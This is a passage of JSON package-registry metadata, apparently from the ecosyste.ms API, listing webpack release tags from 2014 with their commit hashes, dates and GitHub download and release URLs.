eleases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","p